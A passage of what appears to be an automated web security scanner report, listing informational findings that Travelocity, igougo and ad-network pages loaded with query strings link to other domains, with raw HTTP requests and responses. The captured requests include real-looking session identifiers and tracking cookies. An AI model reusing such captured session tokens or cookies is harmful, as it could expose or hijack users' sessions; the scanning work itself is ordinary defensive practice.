Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:09:11 GMT
Content-Length: 1710
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:09:11 GMT; path=/
Set-Cookie: pubfreq_26072_21044_1115692444=823-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:09:11 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAAAAAAAAAAAAAAAAAAA
...[SNIP]...
</iframe>');document.writeln('<img src="http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?labels=Travel" style="display: none;position:absolute;top:-15000px;" border="0" height="1" width="1" alt="Quantcast"/>');

19.165. http://static.igougo.com/scripts/all_53403.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.igougo.com
Path:   /scripts/all_53403.ashx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /scripts/all_53403.ashx?Lo0P=d10051c1dcf48dfca1203fd21cf4182153459 HTTP/1.1
Host: static.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=455|Accelerated|915|12|0; SL_NV12=1|12

Response

HTTP/1.1 200 OK
Server: SLRS
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 27 Sep 2011 02:07:25 GMT
X-Strangeloop: RCache
Content-Length: 53459
X-SL-RCache: Cached
Cache-Control: public, max-age=31235580
Expires: Fri, 28 Sep 2012 12:59:58 GMT
Date: Mon, 03 Oct 2011 00:26:58 GMT
Connection: close
Vary: Accept-Encoding

SearchAssistant=Class.create({options:$H({className:"suggest",minimumCharacters:3,timeout:10000,delay:40,displayNoResults:!0,noResultsMessage:"No Suggestion",cache:!0,templateField:null,maxItems:10,on
...[SNIP]...
</script>');try{Prototype.Browser.WebKit&&typeof Effect=="undefined"&&document.write('<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8/effects.js"></script>
...[SNIP]...

19.166. http://tag.admeld.com/id

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /id

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /id?redirect=http://cas.criteo.com/delivery/admeld_map?match=[admeld_user_id] HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true; __qca=P0-273080792-1316409083560

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Location: http://cas.criteo.com/delivery/admeld_map?match=4ec87822-8f33-4202-954a-f6f06a37734b
Content-Length: 268
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 02 Oct 2011 23:49:01 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://cas.criteo.com/delivery/admeld_map?match=4ec87822-8f33-4202-954a-f6f06a37734b">here</a>
...[SNIP]...

19.167. http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap2-cdn.rubiconproject.com
Path:   /partner/scripts/rubicon/emily.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /partner/scripts/rubicon/emily.html?rtb_ext=1&pc=8154/13209 HTTP/1.1
Host: tap2-cdn.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ses15=13378^2; csi15=3209195.js^2^1317595891^1317598688; pux=1022%3D15352%261185%3D15232%261197%3D15352%261430%3D15352%261512%3D15232%261902%3D15352%261986%3D15232%261994%3D15352%262025%3D15352%262046%3D15232%262081%3D15352%262084%3D15352%262100%3D15352%262101%3D15232%262132%3D15352%262135%3D15352%262211%3D15352%262245%3D15352%262249%3D15352%262271%3D15352%26fimservePS%3D15232%26w55c%3D15352%261523ext%3D15352%262211ext%3D15352%26; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=8154/13209; rdk1=0; ses1=13209^1; csi1=3226251.js^1^1317599333^1317599333

Response

HTTP/1.1 200 OK
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Last-Modified: Sun, 02 Oct 2011 07:27:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9327
Cache-Control: max-age=600
Expires: Sun, 02 Oct 2011 23:58:54 GMT
Date: Sun, 02 Oct 2011 23:48:54 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!-- Copyright the Rubicon Project 2010 -->


<html>
<head>
<title></title>
</head>
<
...[SNIP]...
</script>
<img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>


</body>
...[SNIP]...

19.168. http://travel.travelocity.com/hotel/HotelAvailability.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelAvailability.do

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.2.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:47 GMT
Server: Apache
Set-Cookie: JSID=C3B4C0033B2F65D5EA7EF7750A5F38F6.p0742; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 90909

<!--
JSESSIONID = C3B4C0033B2F65D5EA7EF7750A5F38F6.p0742
TPSESSIONID = null
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script type="text/javascript">var jsessionid="C3B4C0033B2F65D5EA7EF77
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/reset-min.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/headerfooter_v1.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/global.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/calendar_v3.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/hotels.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/HF_hotels_overrides.css"/>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/navigation.js"></script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/global.js"></script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/hotels.js"></script>
...[SNIP]...
</script> <link type="text/css" href="http://i.travelpn.com.edgesuite.net/jQuery/themes/base/ui.core.css" rel="stylesheet" />
<link type="text/css" href="http://i.travelpn.com.edgesuite.net/jQuery/themes/base/ui.theme.css" rel="stylesheet" />
<link type="text/css" href="http://i.travelpn.com.edgesuite.net/11.10/css/calendar_datepicker.css" rel="stylesheet" />
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jquery/jquery.min.js"></script>
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jquery/ui/jquery.ui.core.js"></script>
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/calendar_datepicker.js"></script>
...[SNIP]...
<body id="hot" onload="javascript:on_load();" >
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/mbox.js"></script>
...[SNIP]...
<li><a onClick="feedback();return false;" href="http://travelpn.qualtrics.com/SE/?SID=SV_802MeVVezJbOvVW" title="Feedback" id="feedback">Feedback</a>
...[SNIP]...
<a href="http://www.travelocity.com/" title="Travelocity"><img src="http://i.travelpn.com.edgesuite.net/images/graphics/travelocity-logo228x69.gif" name="HeaderLogoNew" border="0" alt="Travelocity Logo"></a>
...[SNIP]...
<div class="a_content"><img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/alertSM.gif" name="AlertSM" height="13" width="12" border="0"><h4>
...[SNIP]...
<li><a href="http://www.roaminggnomestore.com/" title="Gnome Store" rel="nofollow">Gnome Store</a>
...[SNIP]...
<li class="sprite-au_sm"><a href="http://www.zuji.com.au/site/travel/hotels/" title="Australia">Australia</a></li>
<li class="sprite-ca_sm"><a href="http://www.travelocity.ca/ca/hotels" title="Canada">Canada</a></li>
<li class="sprite-cl_sm"><a href="http://www.allhotels.cl/" title="Chile">Chile</a></li>
<li class="sprite-co_sm"><a href="http://www.allhotels.com.co/" title="Colombia">Colombia</a></li>
<li class="sprite-cr_sm"><a href="http://www.allhotels.co.cr/" title="Costa Rica">Costa Rica</a>
...[SNIP]...
<li class="sprite-dk_sm"><a href="http://www.rejsefeber.dk/dk/hotel/" title="Denmark">Denmark</a></li>

<li class="sprite-ec_sm"><a href="http://www.allhotels.com.ec/" title="Ecuador">Ecuador</a></li>
<li class="sprite-fr_sm"><a href="http://www.fr.lastminute.com/site/voyages/reservation-hotels/" title="France">France</a></li>
<li class="sprite-de_sm"><a href="http://www.lastminute.de/de_DE/lmn2/travel/hotel/new.do" title="Germany">Germany</a></li>
<li class="sprite-hk_sm"><a href="http://www.zuji.com.hk/site/travel/hotels/" title="Hong Kong">Hong Kong</a>
...[SNIP]...
<li class="sprite-ie_sm"><a href="http://www.lastminute.ie/site/travel/hotels/" title="Ireland">Ireland</a></li>
<li class="sprite-it_sm"><a href="http://www.it.lastminute.com/site/viaggi/hotels/" title="Italy">Italy</a></li>
<li class="sprite-kp_sm"><a href="http://www.nextour.co.kr/" title="Korea">Korea</a>
...[SNIP]...
<li class="sprite-no_sm"><a href="http://www.reisefeber.no/no/hotel/" title="Norway">Norway</a></li>
<li class="sprite-py_sm"><a href="http://www.allhotels.com.py/" title="Paraguay">Paraguay</a></li>
<li class="sprite-pe_sm"><a href="http://www.allhotels.pe/" title="Peru">Peru</a></li>
<li class="sprite-sg_sm"><a href="http://www.zuji.com.sg/site/travel/hotels/" title="Singapore">Singapore</a></li>
<li class="sprite-es_sm"><a href="http://www.es.lastminute.com/site/viajes/hoteles/" title="Spain">Spain</a></li>
<li class="sprite-se_sm"><a href="http://www.resfeber.se/se/hotel/" title="Sweden">Sweden</a>
...[SNIP]...
<li class="sprite-uy_sm"><a href="http://www.allhotels.com.uy/" title="Uruguay">Uruguay</a></li>
<li class="sprite-ve_sm last"><a href="http://www.allhotels.co.ve/" title="Venezuela">Venezuela</a>
...[SNIP]...
<li class="first"><a href="http://www.allhotels.com/" title="All Hotels">All Hotels</a>
...[SNIP]...
<li><a href="http://www.holidayautos.co.uk/" title="holiday autos">holiday autos</a>
...[SNIP]...
<li><a href="http://www.igougo.com/" title="IgoUgo&reg;">IgoUgo&reg;</a>
...[SNIP]...
<li><a href="http://www.travelguru.com/" title="Travel Guru">Travel Guru</a>
...[SNIP]...
<li><a href="http://www.vacations.com/" title="Vacations.com">Vacations.com</a>
...[SNIP]...
<li><a href="http://www.windowseatblog.com/" title="Window Seat Blog">Window Seat Blog</a>
...[SNIP]...
<li><a href="http://www.worldchoicetravel.com/" title="World Choice Travel&reg;" rel="nofollow">World Choice Travel&reg;</a>
...[SNIP]...
<li class="last"><a href="http://www.zuji.com/" title="Zuji">Zuji</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=75787&p=irol-news&nyo=0" title="Press Releases">Press Releases</a>
...[SNIP]...
<li><a href="http://www.travelocitybusiness.com" title="Travelocity Business">Travelocity Business</a>
...[SNIP]...
</div>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/tracking_tags_US.js"></script>
...[SNIP]...

19.169. http://travel.travelocity.com/hotel/HotelCobrand.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelCobrand.do

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /hotel/HotelCobrand.do?Service=TRAVELOCITY&SearchPath=hots&old_cb=N&mode=1&x=53&y=14pax_cnt=2&city=&state=&dateLeavingMonth=10&dateLeavingDay=9&dateReturningMonth=10&dateReturningDay=16&adults=1&children=0&WA1=03010&WA2=away.com&WA3=cpc&WA4=45&WA5=trave_hotelbookingtab_awy_|u&WA6=hot&WA8=|,, HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:37:43 GMT
Server: Apache
Set-Cookie: JSID=CFC4461E78A68A9B3D607597C3371103.p0739; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 3562

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--
JSESSIONID = CFC4461E78A68A9B3D607597C3371103.p0739
TPSESSIONID = null
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/swfobject.js"></script>
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/global.css"/>
</head>
...[SNIP]...
<h1><img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/tk_title_hotel.gif" name="TimeKeeperTitleHotel" border="0"></h1>
...[SNIP]...
<div id="progress"><img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/tk_progress.gif" name="TimeKeeperProgressGif" border="0"></div>
...[SNIP]...
<div id="tips"><img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/tk_did_you_know.gif" name="TimeKeeperDidYouKnow" border="0"></div>
...[SNIP]...

19.170. http://travel.travelocity.com/hotel/HotelDetail.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelDetail.do

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains (see the response excerpt below):

Request

GET /hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:34 GMT
Server: Apache
Set-Cookie: JSID=A7716E473BF556C6BB6CA1860CF34A22.p0717; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 113893

<!--
JSESSIONID = A7716E473BF556C6BB6CA1860CF34A22.p0717
TPSESSIONID = T0075003076751026003112815903110013629
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script type="text/javascript">var j
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/reset-min.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/headerfooter_v1.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/global.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/calendar_v3.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/hotels.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/HF_hotels_overrides.css"/>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/navigation.js"></script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/global.js"></script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/hotels.js"></script>
...[SNIP]...
</script> <link type="text/css" href="http://i.travelpn.com.edgesuite.net/jQuery/themes/base/ui.core.css" rel="stylesheet" />
<link type="text/css" href="http://i.travelpn.com.edgesuite.net/jQuery/themes/base/ui.theme.css" rel="stylesheet" />
<link type="text/css" href="http://i.travelpn.com.edgesuite.net/11.10/css/calendar_datepicker.css" rel="stylesheet" />
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jquery/jquery.min.js"></script>
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jquery/ui/jquery.ui.core.js"></script>
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/calendar_datepicker.js"></script>
...[SNIP]...
<body id="hot" class="hotdet" onload="on_load_search();reloadEvents('workspace')" >
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/mbox.js"></script>
...[SNIP]...
<li><a onClick="feedback();return false;" href="http://travelpn.qualtrics.com/SE/?SID=SV_802MeVVezJbOvVW" title="Feedback" id="feedback">Feedback</a>
...[SNIP]...
<a href="http://www.travelocity.com/" title="Travelocity"><img src="http://i.travelpn.com.edgesuite.net/images/graphics/travelocity-logo228x69.gif" name="HeaderLogoNew" border="0" alt="Travelocity Logo"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://travelocity.ugc.bazaarvoice.com/static/0025-en_us/bvapi.js"></script>
...[SNIP]...
<div class="details" style="width: 350px">
<img src="http://i.travelocity.com.edgesuite.net/legacy/logos/ht_omlogo.gif" class="logo"><p>
...[SNIP]...
<a href="/hotel/HotelDetailReviewRead.do?propertyId=4810&reviewFromIndex=0&tipFromIndex=0&tipsPage=false&travelerCategory=All&reviewPage=&tab=read&fromPage=" onclick="bDspExit=false;"><img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/icon_tvlrRate_lg_4-0.gif" name="iconTvlrRateLg_4-0" border="0" alt="4-0"></a>
...[SNIP]...
<a href="javascript:print();"><img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/icon_print.gif" name="Printer" height="15" width="20" border="0" alt="Print this page"></a>
...[SNIP]...
<!-- ClickToCall enabled -->
<script type='text/javascript' src='//static.atgsvcs.com/js/atgsvcs.js'></script>
...[SNIP]...
<div class="a_content">
       <img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/alertSM.gif" name="AlertSM" height="13" width="12" border="0"><h4>
...[SNIP]...
PageName=HotelHelpMultiRoom" onclick="o_help = window.open(this.href, 'title', 'toolbar=no,status=no,scrollbars=yes,resizable=yes,width=500,height=400');if(!o_help.closed)o_help.focus();return false;"><img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/question.gif" name="question" height="12" width="12" border="0" class="helpimg"></a>
...[SNIP]...
<div class="a_content">
       <img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/alertSM.gif" name="AlertSM" height="13" width="12" border="0"><h4>
...[SNIP]...
<li><a href="http://www.roaminggnomestore.com/" title="Gnome Store" rel="nofollow">Gnome Store</a>
...[SNIP]...
<li class="sprite-au_sm"><a href="http://www.zuji.com.au/site/travel/hotels/" title="Australia">Australia</a></li>
<li class="sprite-ca_sm"><a href="http://www.travelocity.ca/ca/hotels" title="Canada">Canada</a></li>
<li class="sprite-cl_sm"><a href="http://www.allhotels.cl/" title="Chile">Chile</a></li>
<li class="sprite-co_sm"><a href="http://www.allhotels.com.co/" title="Colombia">Colombia</a></li>
<li class="sprite-cr_sm"><a href="http://www.allhotels.co.cr/" title="Costa Rica">Costa Rica</a>
...[SNIP]...
<li class="sprite-dk_sm"><a href="http://www.rejsefeber.dk/dk/hotel/" title="Denmark">Denmark</a></li>

